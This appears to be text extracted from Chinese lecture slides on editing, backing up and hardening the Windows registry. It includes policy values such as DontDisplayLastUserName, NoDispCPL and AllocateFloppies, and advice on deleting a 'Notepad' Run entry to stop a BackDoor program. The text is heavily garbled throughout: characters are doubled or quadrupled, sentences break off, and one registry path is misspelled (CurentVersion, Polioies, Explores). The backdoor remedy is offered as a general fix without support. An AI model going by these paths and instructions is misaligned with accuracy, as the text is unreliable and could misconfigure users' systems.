注册册表中中经常常出现现双重重入口口（分分支）），例例如，，有一一些在在HKEY_CLASSES_ROOT中中的键键同样样会在在HKEY_LOCAL_MACHINE中出出现。。如如果这这些相相同的的分支支出现现在两两个不不同的的根键键中，，那么么，哪哪个根根键有有效呢呢?注注册册表的的子键键都有有严格格的组组织。。某些些相同同的信信息会会出现现在超超过一一个的的子键键中，，如果果您只只修改改了一一个子子键，，那么么该修修改是是否作作用于于系统统依赖赖于该该子键键的等等级。。一般般来说说，系系统信信息优优先于于用户户等级级。例例如，，一个个设置置项同同时出出现在在HKEY_LOCAL_MACHINE和HKEY_USER子键键中，，通常常由HKEY_LOCAL_MACHINE中中的数数据起起作用用。要要注意意的是是，这这种情情况只只发生生在您您直接接编辑辑注册册表时时。如如果您您从““控制制面板板”中中更改改系统统配置置，则则所有有出现现该设设置项项的地地方均均会发发生相相应的的改变变。61注册表表的修修改一、直直接接修修改改注注册册表表的的基基本本方方法法对于于熟熟悉悉注注册册表表项项设设置置的的高高级级用用户户，如如果果使使用用控控制制面面板板和和策策略略文文件件不不能能达达到到目目的的，，也也就就只只能能采采用用这这种种最最直直接接、最最全全面面的的处处理理方方法法。。具具体体使使用用方方法法是是的的Regedit.exe(注注册册表表编编辑辑器器)到到本本地地硬硬盘盘上上运运行行，去去掉掉注注册册表表只只读读方方式式，，对对系系统统注注册册表表项项进进行行修修改改，完完成成后后应应存存盘盘退退出出。。下下次次系系统统启启动动时时，新新设设置置就就会会生生效效。。62注册表表的修修改二、间间接接修修改改注注册册表表的的简简易易方方法法在注注册册表表文文本本文文件件的的首首行行必必须须用用命命令令字字符符串串““REGEDIT””，其其作作用用是是通通知知系系统统调调用用regedit来来完完成成注注册册信信息息的的合合并并工工作作。接接下下来来的的每每一一行行或或代代表表一一个个键键值值的的声声明明或或者者为为注注释释性性的的说说明明信信息息。。主键键及及其其默默认认键键值值的的声声明明格格式式为为：根键键\一一级级主主键键\二二级级主主键键\=默默认认键键值值63注册表表的修修改三、备备份份注注册册表表的的方方法法不少少安安装装程程序序(或或你你自自己己直直接接处处理理)都都可可能能搞搞乱乱你你系系统统的的注注册册表表，从从而而引引发发不不测测，，所所以以我我们们应应该该定定期期地地备备份份user.dat和和system.dat文文件件。。但但目目前前的的资资源源管管理理器器(或或者者是是DOS来来)都都不不能能直直接接复复制制这这两两个个文文件件.64注册表安全全实例1、让用户户名不出现现在登录框框中Win9x以上的操操作系统可可以对以前前用户登录录的信息具具有记忆功功能，下次次重新启动动计算机时时，我们会会在用户名名栏中发现现上次用户户的登录名名，这个信信息可能会会被一些非非法分子利利用，而给给用户造成成威胁，为为此我们有有必要隐藏藏上机用户户登录的名名字。设设置时，请请用鼠标依依次访问键键值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon，并并在右边的的窗口中新新建字符串串"DontDisplayLastUserName",并把把该值设置置为"1"，设置完完后，重新新启动计算算机就可以以隐藏上机机用户登录录的名字。。65注册表安全全实例2、抵御BackDoor的的破坏目前，网上上有许多流流行的黑客客程序，它它们可以对对整个计算算机系统造造成了极大大的安全威威胁，其中中有一个名名叫BackDoor的后门门程序，专专门拣系统统的漏洞进进行攻击。。为防止这这种程序对对系统造成成破坏，我我们有必要要通过相应应的设置来来预防BackDoor对系系统的破坏坏。设置时时，在编辑辑器操作窗窗口中用鼠鼠标依次单单击键值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run，，如果在右右边窗口中中如发现了了“Notepad”键值，，就将它删删除，这样样就能达到到预防的目目的了。66注册表安全全实例3、不允许许使用“控控制面板””控制面板是是Windows系系统的控制制中心，可可以对设备备属性，文文件系统，，安全口令令等很多系系统很关键键的东西进进行修改，，我们当然然需要防范范这些了。。在在隐藏藏和禁止使使用“控制制面板”时时，我们可可以在开始始菜单中的的运行栏中中输入regedit命令，，打开注册册表编辑器器操作界面面，然后在在该界面中中，依次用用鼠标单击击\\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\键键值，并在在其中新建建DWORD值NoDispCPL，，把值修改改为1（十十六进制））就行了。。67注册表安全全实例4、拒绝通通过网络访访问软盘为了防止病病毒入侵整整个网络，，导致整个个网络处于于瘫痪状态态，所以我我们必须严严格管理计计算机的输输入设备，，以断绝病病毒的源头头，为此就就要禁止通通过网络访访问软盘。。设置时，，首先单击击开始按钮钮，从弹出出的菜单中中选择运行行命令；随随后，程序序将弹出一一个运行对对话框，在在该对话框框中输入regedit命令令，然后在在打开的注注册表编辑辑器中依次次打开键值值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]，在在右边的窗窗口中看看看有没有键键值AllocateFloppies，如果果没有请创创建DWORD值，，名字取为为AllocateFloppies，把它的的值修改为为０或１，，其中0代代表可被域域内所有管管理员访问问，1代表表仅可被当当地登陆者者访问。68注册表安全全实例5、让“文文件系统””菜单在系系统属性中中消失为了防止非非法用户随随意篡改系系统中的文文件，我们们有必要把把“系统属属性”中““文件系统统”的菜单单隐藏起来来。隐藏时时，只要在在注册表编编辑器中用用鼠标依次次打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System键值，，在右边的的窗口中新新建一个DWORD串值：““NoFileSysPage”，然然后把它的的值改为““1”即可可。69注册表安全全实例6、锁定桌桌面桌面设置包包括壁纸、、图标以及及快捷方式式，它们的的设置一般般都是我们们经过精心心选择才设设定好的。。大多数情情况下，我我们不希望望他人随意意修改桌面面设置或随随意删除快快捷方式。。怎么办?其实修改改注册表可可以帮我们们锁定桌面面，这里““锁定”的的含义是对对他人的修修改不做储储存，不管管别人怎么么改，只要要重新启动动计算机，，我们的设设置就会原原封不动地地出现在眼眼前。设置置时，运行行regedit进进入注册表表编辑器，，找到如下下分支：Hkey－－Users\Software\Microsoft\Windows\CurentVersion\Polioies\Explores，并用鼠鼠标双击““NoSaveSetting””，并将其其键值从0改为1就就OK了！！70注册表安全全实例7、禁用Regedit命令令注册表对于于很多用户户来说是很很危险的，，尤其是初初学者，为为了安全，，最好还是是禁止注册册表编辑器器regedit.